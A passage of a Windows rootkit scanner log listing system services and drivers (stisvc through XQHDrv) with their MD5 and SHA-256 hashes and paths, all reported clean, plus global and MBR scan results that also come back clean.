16:43:39.0378 0x0dd0  [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc          C:\Windows\System32\wiaservc.dll
16:43:39.0393 0x0dd0  stisvc - ok
16:43:39.0393 0x0dd0  [ 7785DC213270D2FC066538DAF94087E7, F09CB2895241719CA5147B2EE9F7ECBD0303AFFB5CD896F06D4D29BAAAFC207B ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
16:43:39.0393 0x0dd0  storflt - ok
16:43:39.0393 0x0dd0  [ C40841817EF57D491F22EB103DA587CC, 5FAA2DE43BADC16A898C0C290C44C41E4411D919A95FE8C6FF45EA7A34495079 ] StorSvc         C:\Windows\system32\storsvc.dll
16:43:39.0393 0x0dd0  StorSvc - ok
16:43:39.0393 0x0dd0  [ D34E4943D5AC096C8EDEEBFD80D76E23, 1DD7F6F97060B5F763A04ACA1F75E59DAB09EF824FD09B83FC3C192837D006DE ] storvsc         C:\Windows\system32\drivers\storvsc.sys
16:43:39.0409 0x0dd0  storvsc - ok
16:43:39.0409 0x0dd0  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
16:43:39.0409 0x0dd0  swenum - ok
16:43:39.0409 0x0dd0  [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv           C:\Windows\System32\swprv.dll
16:43:39.0425 0x0dd0  swprv - ok
16:43:39.0425 0x0dd0  [ C3A39C4079305480972D29C44B868C78, 8F1BB75C743256F905EAEDE744B6082C53774C49126875FB4E4FBA30F5478B17 ] Synth3dVsc      C:\Windows\system32\drivers\synth3dvsc.sys
16:43:39.0425 0x0dd0  Synth3dVsc - ok
16:43:39.0471 0x0dd0  [ 2E730941CC5BF6200A4F56D1E9C24AAD, 758836D55DC84F3EBE9917DC6FAB8E6170A5B238FEDBCFDB6D7C5C6EA98E08B2 ] SysMain         C:\Windows\system32\sysmain.dll
16:43:39.0487 0x0dd0  SysMain - ok
16:43:39.0503 0x0dd0  [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
16:43:39.0503 0x0dd0  TabletInputService - ok
16:43:39.0518 0x0dd0  [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv         C:\Windows\System32\tapisrv.dll
16:43:39.0518 0x0dd0  TapiSrv - ok
16:43:39.0565 0x0dd0  [ B2875D7ABB82867DC3AA03D991940201, F954C33FBA912A517B59330F6438C1953F9F1D8F4D8FD25945EB836A1DB07ABB ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
16:43:39.0596 0x0dd0  Tcpip - ok
16:43:39.0627 0x0dd0  [ B2875D7ABB82867DC3AA03D991940201, F954C33FBA912A517B59330F6438C1953F9F1D8F4D8FD25945EB836A1DB07ABB ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
16:43:39.0674 0x0dd0  TCPIP6 - ok
16:43:39.0674 0x0dd0  [ 7FE5586314EE7D6AA8483264A089E5AF, 4E3EA68713A45C22F1B9A1AA125E15D06D0C5E637B815537431ADFB6D7563879 ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
16:43:39.0674 0x0dd0  tcpipreg - ok
16:43:39.0674 0x0dd0  [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
16:43:39.0674 0x0dd0  TDPIPE - ok
16:43:39.0690 0x0dd0  [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
16:43:39.0690 0x0dd0  TDTCP - ok
16:43:39.0690 0x0dd0  [ AA77EB517D2F07A947294F260E3ACA83, B7A5DF3066830C0C2302B059778A67419792058A0D300C471DE40AB245EA7E58 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
16:43:39.0690 0x0dd0  tdx - ok
16:43:39.0690 0x0dd0  [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
16:43:39.0690 0x0dd0  TermDD - ok
16:43:39.0705 0x0dd0  [ 2B5BDFF688EC9871D7EC5837833374E9, BD6C629FA2938987ABF95B790B20F0B7D4D023D5013E575F343A802D6213074E ] terminpt        C:\Windows\system32\drivers\terminpt.sys
16:43:39.0705 0x0dd0  terminpt - ok
16:43:39.0721 0x0dd0  [ 008CD4EBFABCF78D0F19B3778492648C, 9050490EEE0AD86E73F0A82D83E4FC29DF84F6B6FDB389AE135FD712B5F425BE ] TermService     C:\Windows\System32\termsrv.dll
16:43:39.0721 0x0dd0  TermService - ok
16:43:39.0737 0x0dd0  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes          C:\Windows\system32\themeservice.dll
16:43:39.0737 0x0dd0  Themes - ok
16:43:39.0737 0x0dd0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER     C:\Windows\system32\mmcss.dll
16:43:39.0737 0x0dd0  THREADORDER - ok
16:43:39.0737 0x0dd0  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks          C:\Windows\System32\trkwks.dll
16:43:39.0752 0x0dd0  TrkWks - ok
16:43:39.0752 0x0dd0  [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
16:43:39.0752 0x0dd0  TrustedInstaller - ok
16:43:39.0768 0x0dd0  [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
16:43:39.0768 0x0dd0  tssecsrv - ok
16:43:39.0768 0x0dd0  [ D11C783E3EF9A3C52C0EBE83CC5000E9, A136C355D4C8945729163D15801364A614E23217B15F9313C85BA45BB71A74EB ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
16:43:39.0768 0x0dd0  TsUsbFlt - ok
16:43:39.0768 0x0dd0  [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
16:43:39.0768 0x0dd0  TsUsbGD - ok
16:43:39.0768 0x0dd0  [ E1748D04AE40118B62BC18AC86032192, A954B141D1B27272C771D14F3B40C7CC1F572DD72559F2C96182EFBE2B095FDE ] tsusbhub        C:\Windows\system32\drivers\tsusbhub.sys
16:43:39.0783 0x0dd0  tsusbhub - ok
16:43:39.0783 0x0dd0  [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
16:43:39.0783 0x0dd0  tunnel - ok
16:43:39.0783 0x0dd0  [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
16:43:39.0783 0x0dd0  uagp35 - ok
16:43:39.0799 0x0dd0  [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
16:43:39.0799 0x0dd0  udfs - ok
16:43:39.0815 0x0dd0  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect       C:\Windows\system32\UI0Detect.exe
16:43:39.0815 0x0dd0  UI0Detect - ok
16:43:39.0815 0x0dd0  [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
16:43:39.0815 0x0dd0  uliagpkx - ok
16:43:39.0815 0x0dd0  [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
16:43:39.0815 0x0dd0  umbus - ok
16:43:39.0830 0x0dd0  [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass          C:\Windows\system32\drivers\umpass.sys
16:43:39.0830 0x0dd0  UmPass - ok
16:43:39.0830 0x0dd0  [ A293DCD756D04D8492A750D03B9A297C, 203600ED0B7F8BA4C6D6F4ED810F4DF5AB70928B06EC4131C5D8ADF628444ED1 ] UmRdpService    C:\Windows\System32\umrdp.dll
16:43:39.0830 0x0dd0  UmRdpService - ok
16:43:39.0846 0x0dd0  [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost        C:\Windows\System32\upnphost.dll
16:43:39.0846 0x0dd0  upnphost - ok
16:43:39.0861 0x0dd0  [ B0435098C81D04CAFFF80DDB746CD3A2, A17B207740382E38729571F0B0BC98FF874E856A7C7CE9EB930328A2AD88F52A ] usbaudio        C:\Windows\system32\drivers\usbaudio.sys
16:43:39.0861 0x0dd0  usbaudio - ok
16:43:39.0861 0x0dd0  [ 28B81917A195B67617AF7DCF4DFE5736, 40A4D2AAE1BDE5ABA8708ED150396E913C566ECD5CDA40D6C6DB256F1B9FD4A9 ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
16:43:39.0861 0x0dd0  usbccgp - ok
16:43:39.0861 0x0dd0  [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir          C:\Windows\system32\drivers\usbcir.sys
16:43:39.0877 0x0dd0  usbcir - ok
16:43:39.0877 0x0dd0  [ B626F048318DAE65A3317F0592BE592C, 284D8FFE1D35F852EFDA182A72288AC3A10D6ED825FE2CC5812497D3FE291AF1 ] usbehci         C:\Windows\system32\drivers\usbehci.sys
16:43:39.0877 0x0dd0  usbehci - ok
16:43:39.0877 0x0dd0  [ 390109E8E05BA00375DCB1ED64DC60AF, B8628502590B423BEFB6F7C8C69FAD0667AD0746FF6B444EE02016E8E1052B78 ] usbhub          C:\Windows\system32\drivers\usbhub.sys
16:43:39.0893 0x0dd0  usbhub - ok
16:43:39.0893 0x0dd0  [ B4DF0F4C1D9D25DFE1DAD1D8670F1D4F, 4317C2DEDC639527B53864BAEC46CBE022D298C0503E29E1072DD1C851D92BFC ] usbohci         C:\Windows\system32\drivers\usbohci.sys
16:43:39.0893 0x0dd0  usbohci - ok
16:43:39.0893 0x0dd0  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\drivers\usbprint.sys
16:43:39.0893 0x0dd0  usbprint - ok
16:43:39.0908 0x0dd0  [ D029DD09E22EB24318A8FC3D8138BA43, C95805E8BF75ECB939520AE86420B16467B0771C161C51C9F1A37649ADFADCD0 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
16:43:39.0908 0x0dd0  USBSTOR - ok
16:43:39.0908 0x0dd0  [ CFEAAF96E666E3DCBD8F6DFF516784AE, 006218A3DB5851790CC0A7F3DCD7B3AF82F624DA679296DE507AFD36C5468317 ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
16:43:39.0908 0x0dd0  usbuhci - ok
16:43:39.0908 0x0dd0  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
16:43:39.0908 0x0dd0  UxSms - ok
16:43:39.0924 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] VaultSvc        C:\Windows\system32\lsass.exe
16:43:39.0924 0x0dd0  VaultSvc - ok
16:43:39.0924 0x0dd0  [ 0E3C4F20B2CE21168F3242D9CAC6CBF2, 1BD5E1A2000EBC1C335A8960ACDCD08BDC8230F533A80D086D2EE6FE4990EA02 ] VBoxUSBMon      C:\Windows\system32\DRIVERS\VBoxUSBMon.sys
16:43:39.0924 0x0dd0  VBoxUSBMon - ok
16:43:39.0924 0x0dd0  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
16:43:39.0924 0x0dd0  vdrvroot - ok
16:43:39.0939 0x0dd0  [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds             C:\Windows\System32\vds.exe
16:43:39.0955 0x0dd0  vds - ok
16:43:39.0955 0x0dd0  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
16:43:39.0955 0x0dd0  vga - ok
16:43:39.0955 0x0dd0  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
16:43:39.0955 0x0dd0  VgaSave - ok
16:43:39.0955 0x0dd0  VGPU - ok
16:43:39.0971 0x0dd0  [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
16:43:39.0971 0x0dd0  vhdmp - ok
16:43:39.0971 0x0dd0  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\drivers\viaide.sys
16:43:39.0971 0x0dd0  viaide - ok
16:43:39.0986 0x0dd0  [ 86EA3E79AE350FEA5331A1303054005F, 7E7D6027EB41E591633C7383A5D29A3BA8ECFC08C177D2BCF741EE27686B1691 ] vmbus           C:\Windows\system32\drivers\vmbus.sys
16:43:39.0986 0x0dd0  vmbus - ok
16:43:39.0986 0x0dd0  [ 7DE90B48F210D29649380545DB45A187, 09522F84285D62B961868DA98C40B82E746CA4D24A9780905673A2349D6B07F4 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
16:43:39.0986 0x0dd0  VMBusHID - ok
16:43:39.0986 0x0dd0  [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
16:43:39.0986 0x0dd0  volmgr - ok
16:43:40.0002 0x0dd0  [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
16:43:40.0002 0x0dd0  volmgrx - ok
16:43:40.0017 0x0dd0  [ 0D08D2F3B3FF84E433346669B5E0F639, 3D6716CEC95B8861A7CC5778E91F310528DC6BEE0E57A3C8757FC675154EBDEC ] volsnap         C:\Windows\system32\drivers\volsnap.sys
16:43:40.0017 0x0dd0  volsnap - ok
16:43:40.0033 0x0dd0  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
16:43:40.0033 0x0dd0  vsmraid - ok
16:43:40.0064 0x0dd0  [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS             C:\Windows\system32\vssvc.exe
16:43:40.0095 0x0dd0  VSS - ok
16:43:40.0158 0x0dd0  [ 99030F89DE0CFA7428A38D498CE5DDD7, 64E64962BC19047FC55EB73F007D25953E86D8DF0D6EA6D28E0BB47D5A50E8AF ] VSStandardCollectorService140 F:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe
16:43:40.0158 0x0dd0  VSStandardCollectorService140 - ok
16:43:40.0158 0x0dd0  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
16:43:40.0158 0x0dd0  vwifibus - ok
16:43:40.0173 0x0dd0  [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
16:43:40.0173 0x0dd0  vwififlt - ok
16:43:40.0173 0x0dd0  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
16:43:40.0189 0x0dd0  W32Time - ok
16:43:40.0189 0x0dd0  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
16:43:40.0189 0x0dd0  WacomPen - ok
16:43:40.0189 0x0dd0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
16:43:40.0189 0x0dd0  WANARP - ok
16:43:40.0205 0x0dd0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
16:43:40.0205 0x0dd0  Wanarpv6 - ok
16:43:40.0236 0x0dd0  [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine        C:\Windows\system32\wbengine.exe
16:43:40.0251 0x0dd0  wbengine - ok
16:43:40.0267 0x0dd0  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
16:43:40.0267 0x0dd0  WbioSrvc - ok
16:43:40.0283 0x0dd0  [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc         C:\Windows\System32\wcncsvc.dll
16:43:40.0283 0x0dd0  wcncsvc - ok
16:43:40.0283 0x0dd0  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
16:43:40.0298 0x0dd0  WcsPlugInService - ok
16:43:40.0298 0x0dd0  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\drivers\wd.sys
16:43:40.0298 0x0dd0  Wd - ok
16:43:40.0314 0x0dd0  [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
16:43:40.0329 0x0dd0  Wdf01000 - ok
16:43:40.0329 0x0dd0  [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiServiceHost  C:\Windows\system32\wdi.dll
16:43:40.0329 0x0dd0  WdiServiceHost - ok
16:43:40.0329 0x0dd0  [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiSystemHost   C:\Windows\system32\wdi.dll
16:43:40.0345 0x0dd0  WdiSystemHost - ok
16:43:40.0345 0x0dd0  [ EE841B6D1F2B9508D3ABAE52AC05A94F, F1AE981FCDBFC4672A4EABABD41382E93762EFC2EDAD96E75530E7ACA5AF1FD8 ] WebClient       C:\Windows\System32\webclnt.dll
16:43:40.0345 0x0dd0  WebClient - ok
16:43:40.0361 0x0dd0  [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc          C:\Windows\system32\wecsvc.dll
16:43:40.0361 0x0dd0  Wecsvc - ok
16:43:40.0361 0x0dd0  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
16:43:40.0376 0x0dd0  wercplsupport - ok
16:43:40.0376 0x0dd0  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
16:43:40.0376 0x0dd0  WerSvc - ok
16:43:40.0376 0x0dd0  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
16:43:40.0376 0x0dd0  WfpLwf - ok
16:43:40.0376 0x0dd0  [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
16:43:40.0376 0x0dd0  WIMMount - ok
16:43:40.0392 0x0dd0  WinDefend - ok
16:43:40.0392 0x0dd0  WinHttpAutoProxySvc - ok
16:43:40.0407 0x0dd0  [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
16:43:40.0407 0x0dd0  Winmgmt - ok
16:43:40.0454 0x0dd0  [ EBDA1B0F15CB9B2CBCC6C94824E4E054, C51314F7D611E4903DA00EFA8EB99365414436324D256083CE0B5A8E055E8E06 ] WinRM           C:\Windows\system32\WsmSvc.dll
16:43:40.0485 0x0dd0  WinRM - ok
16:43:40.0485 0x0dd0  [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
16:43:40.0485 0x0dd0  WinUsb - ok
16:43:40.0501 0x0dd0  [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc         C:\Windows\System32\wlansvc.dll
16:43:40.0517 0x0dd0  Wlansvc - ok
16:43:40.0532 0x0dd0  [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
16:43:40.0532 0x0dd0  WmiAcpi - ok
16:43:40.0532 0x0dd0  [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
16:43:40.0532 0x0dd0  wmiApSrv - ok
16:43:40.0548 0x0dd0  WMPNetworkSvc - ok
16:43:40.0548 0x0dd0  [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc          C:\Windows\System32\wpcsvc.dll
16:43:40.0548 0x0dd0  WPCSvc - ok
16:43:40.0548 0x0dd0  [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
16:43:40.0548 0x0dd0  WPDBusEnum - ok
16:43:40.0563 0x0dd0  [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
16:43:40.0563 0x0dd0  ws2ifsl - ok
16:43:40.0563 0x0dd0  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc          C:\Windows\System32\wscsvc.dll
16:43:40.0563 0x0dd0  wscsvc - ok
16:43:40.0563 0x0dd0  WSearch - ok
16:43:40.0626 0x0dd0  [ 31F32E0C1A8BA9A37EEC23DE5F27F847, 0180832BC6172C9A4C32B5B222BB3F91EA615A5EBDA98DB79ED4FED258C2D257 ] wuauserv        C:\Windows\system32\wuaueng.dll
16:43:40.0657 0x0dd0  wuauserv - ok
16:43:40.0673 0x0dd0  [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
16:43:40.0673 0x0dd0  WudfPf - ok
16:43:40.0673 0x0dd0  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
16:43:40.0673 0x0dd0  WUDFRd - ok
16:43:40.0688 0x0dd0  [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
16:43:40.0688 0x0dd0  wudfsvc - ok
16:43:40.0688 0x0dd0  [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc         C:\Windows\System32\wwansvc.dll
16:43:40.0704 0x0dd0  WwanSvc - ok
16:43:40.0704 0x0dd0  [ D3D9CB4BA15C1854294517AA8954E201, DFBB6E1A5FF01123FEAD6EFFA67F4A0203792AFDF82EAFFC2DA981A584896542 ] XQHDrv          C:\Windows\system32\DRIVERS\XQHDrv.sys
16:43:40.0719 0x0dd0  XQHDrv - ok
16:43:40.0719 0x0dd0  ================ Scan global ===============================
16:43:40.0719 0x0dd0  [ 168EA9CD9BD6056BB6F60B57D5304BBE, 5A2F98754F042A7D80E7483842967EB362F01D57CE9720B24C7EDAA047F24C6F ] C:\Windows\system32\basesrv.dll
16:43:40.0719 0x0dd0  [ 93E5D2B763374F484918A0909724B3EB, 900F1CCAEFCF77AB678C74D542ABDDA7134CD33D7811537E2829FC69E99F2B3E ] C:\Windows\system32\winsrv.dll
16:43:40.0735 0x0dd0  [ 93E5D2B763374F484918A0909724B3EB, 900F1CCAEFCF77AB678C74D542ABDDA7134CD33D7811537E2829FC69E99F2B3E ] C:\Windows\system32\winsrv.dll
16:43:40.0751 0x0dd0  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
16:43:40.0751 0x0dd0  [ 71C85477DF9347FE8E7BC55768473FCA, A86D6A6D1F5A0EFCD649792A06F3AE9B37158D48493D2ECA7F52DCC1CB9B6536 ] C:\Windows\system32\services.exe
16:43:40.0751 0x0dd0  [ Global ] - ok
16:43:40.0751 0x0dd0  ================ Scan MBR ==================================
16:43:40.0766 0x0dd0  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk1\DR1
16:43:40.0782 0x0dd0  \Device\Harddisk1\DR1 - ok
16:43:40.0782 0x0dd0  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
16:43:40.0829 0x0dd0  \Device\Harddisk0\DR0 - ok
16:43:40.0829 0x0dd0  [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk2\DR2
16:43:40.0829 0x0dd0  \Device\Harddisk2\DR2 - ok
16:43:40.0844 0x0dd0  ================ Scan VBR ==================================
